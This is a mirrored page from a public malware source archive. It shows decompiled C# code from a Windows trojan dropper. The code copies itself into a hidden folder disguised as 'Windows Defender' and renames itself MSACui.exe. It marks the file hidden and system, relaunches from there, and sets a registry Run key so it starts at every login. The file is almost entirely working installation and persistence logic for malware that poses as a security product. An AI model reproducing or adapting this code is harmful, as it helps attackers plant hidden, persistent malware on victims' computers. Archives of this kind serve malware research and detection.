mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-19 18:06:10 +00:00
49 lines
1.9 KiB
C#
49 lines
1.9 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: FTPscanner.Install
|
|
// Assembly: FTPscanner, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 8469568A-499F-4FFB-88BB-33DD24B78A55
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-Dropper.Win32.Sysn.axrz-65a382451dd46ba81b5db9e85a6a586162c5d430c853bf4f688f48a71af44313.exe
|
|
|
|
using Microsoft.Win32;
|
|
using System;
|
|
using System.Diagnostics;
|
|
using System.IO;
|
|
|
|
namespace FTPscanner
|
|
{
|
|
internal class Install
|
|
{
|
|
public static string InstallPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Windows Defender");
|
|
|
|
public static void DirectoryCheck()
|
|
{
|
|
if (!Directory.Exists(Install.InstallPath))
|
|
{
|
|
Directory.CreateDirectory(Install.InstallPath);
|
|
File.SetAttributes(Install.InstallPath, File.GetAttributes(Install.InstallPath) | FileAttributes.System | FileAttributes.Hidden);
|
|
}
|
|
if (!(Process.GetCurrentProcess().MainModule.FileName != Path.Combine(Install.InstallPath, "MSACui.exe")))
|
|
return;
|
|
try
|
|
{
|
|
File.Delete(Path.Combine(Install.InstallPath, "MSACui.exe"));
|
|
}
|
|
catch
|
|
{
|
|
}
|
|
try
|
|
{
|
|
File.Copy(Process.GetCurrentProcess().MainModule.FileName, Path.Combine(Install.InstallPath, "MSACui.exe"));
|
|
File.SetAttributes(Path.Combine(Install.InstallPath, "MSACui.exe"), File.GetAttributes(Path.Combine(Install.InstallPath, "MSACui.exe")) | FileAttributes.System | FileAttributes.Hidden);
|
|
Process.Start(Path.Combine(Install.InstallPath, "MSACui.exe"));
|
|
Environment.Exit(0);
|
|
}
|
|
catch
|
|
{
|
|
}
|
|
}
|
|
|
|
public static void RegistryCheck() => Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true)?.SetValue("Windows Defender", (object) Path.Combine(Install.InstallPath, "MSACui.exe"));
|
|
}
|
|
}
|